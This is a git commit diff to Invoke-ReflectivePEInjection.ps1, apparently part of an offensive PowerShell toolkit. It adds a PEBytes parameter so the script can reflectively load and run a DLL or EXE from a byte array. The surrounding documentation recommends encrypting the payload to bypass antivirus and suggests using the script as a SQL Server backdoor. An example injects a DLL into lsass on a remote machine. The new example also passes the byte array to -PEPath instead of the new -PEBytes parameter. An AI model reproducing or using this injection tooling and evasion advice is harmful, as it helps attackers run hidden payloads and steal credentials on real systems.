Adding PEBytes parameter

Added PEBytes parameter for reflectively loading a PE file passed as a
byte array to the script.

1 files changed, 17 insertions, 5 deletions

diff --git a/CodeExecution/Invoke-ReflectivePEInjection.ps1 b/CodeExecution/Invoke-ReflectivePEInjection.ps1
index f149ed2..4ca1b9d 100644
--- a/CodeExecution/Invoke-ReflectivePEInjection.ps1
+++ b/CodeExecution/Invoke-ReflectivePEInjection.ps1
@@ -23,7 +23,7 @@ from the DLL. The script doesn't wait for the DLL to complete execution, and doe
 remote process. 
 
 
-While this script provides functionality to specify a file to load from disk or from a URL, these are more for demo purposes. The way I'd recommend using the script is to create a byte array
+While this script provides functionality to specify a file to load from disk a URL, or a byte array, these are more for demo purposes. The way I'd recommend using the script is to create a byte array
 containing the file you'd like to reflectively load, and hardcode that byte array in to the script. One advantage of doing this is you can encrypt the byte array and decrypt it in memory, which will
 bypass A/V. Another advantage is you won't be making web requests. The script can also load files from SQL Server and be used as a SQL Server backdoor. Please see the Casaba
 blog linked below (thanks to whitey).
@@ -33,7 +33,7 @@ Author: Joe Bialek, Twitter: @JosephBialek
 License: BSD 3-Clause
 Required Dependencies: None
 Optional Dependencies: None
-Version: 1.3
+Version: 1.4
 
 .DESCRIPTION
 
@@ -47,6 +47,10 @@ The path of the DLL/EXE to load and execute. This file must exist on the compute
 
 A URL containing a DLL/EXE to load and execute.
 
+.PARAMETER PEBytes
+
+A byte array containing a DLL/EXE to load and execute.
+
 .PARAMETER ComputerName
 
 Optional, an array of computernames to run the script on.
@@ -107,6 +111,11 @@ Invoke-ReflectivePEInjection -PEPath DemoEXE.exe -ExeArgs "Arg1 Arg2 Arg3 Arg4"
 Refectively load DemoDLL_RemoteProcess.dll in to the lsass process on a remote computer.
 Invoke-ReflectivePEInjection -PEPath DemoDLL_RemoteProcess.dll -ProcName lsass -ComputerName Target.Local
 
+.EXAMPLE
+
+Load a PE from a byte array.
+Invoke-ReflectivePEInjection -PEPath (Get-Content c:\DemoEXE.exe -Encoding Byte) -ExeArgs "Arg1 Arg2 Arg3 Arg4"
+
 .NOTES
 GENERAL NOTES:
 The script has 3 basic sets of functionality:
@@ -182,6 +191,11 @@ Param(
 	[Parameter(ParameterSetName = "WebFile", Position = 0, Mandatory = $true)]
 	[Uri]
 	$PEUrl,
+
+    [Parameter(ParameterSetName = "Bytes", Position = 0, Mandatory = $true)]
+    [ValidateNotNullOrEmpty()]
+    [Byte[]]
+    $PEBytes,
 	
 	[Parameter(Position = 1)]
 	[String[]]
@@ -2886,14 +2900,12 @@ Function Main
 	
 	Write-Verbose "PowerShell ProcessID: $PID"
 	
-	[Byte[]]$PEBytes = $null
-	
 	if ($PsCmdlet.ParameterSetName -ieq "LocalFile")
 	{
 		Get-ChildItem $PEPath -ErrorAction Stop | Out-Null
 		[Byte[]]$PEBytes = [System.IO.File]::ReadAllBytes((Resolve-Path $PEPath))
 	}
-	else
+	elseif ($PsCmdlet.ParameterSetName -ieq "WebFile")
 	{
 		$WebClient = New-Object System.Net.WebClient